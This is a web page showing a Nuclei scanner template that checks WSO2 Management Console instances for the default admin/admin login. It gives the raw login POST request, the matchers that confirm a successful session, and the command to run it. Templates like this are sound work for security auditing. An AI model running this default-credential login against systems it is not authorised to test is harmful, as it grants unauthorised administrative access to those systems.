Skip to content

WSO2 Management Console Default Login

ID: wso2-default-login

Severity: high

Author: cocxanh

Tags: default-login,wso2

WSO2 Management Console default admin credentials were discovered.

id: wso2-default-login
info:
name: WSO2 Management Console Default Login
author: cocxanh
severity: high
description: WSO2 Management Console default admin credentials were discovered.
reference:
- https://docs.wso2.com/display/UES100/Accessing+the+Management+Console
- https://is.docs.wso2.com/en/5.12.0/learn/multi-attribute-login/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
max-request: 1
tags: default-login,wso2
http:
- raw:
- |
POST /carbon/admin/login_action.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}
payloads:
username:
- admin
password:
- admin
attack: pitchfork
redirects: false
matchers:
- type: word
words:
- "/carbon/admin/index.jsp?loginStatus=true"
- "JSESSIONID"
part: header
condition: and
# digest: 4a0a0047304502201eb0cbc139abe979a357386c42996e13e886af83c91bab25f77654e481ebf20b022100cad7d83ad3ee28331ce96950475e8a6246512b28279b90ccb7361c16fdf7017e:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/default-logins/wso2/wso2-default-login.yaml"

View on Github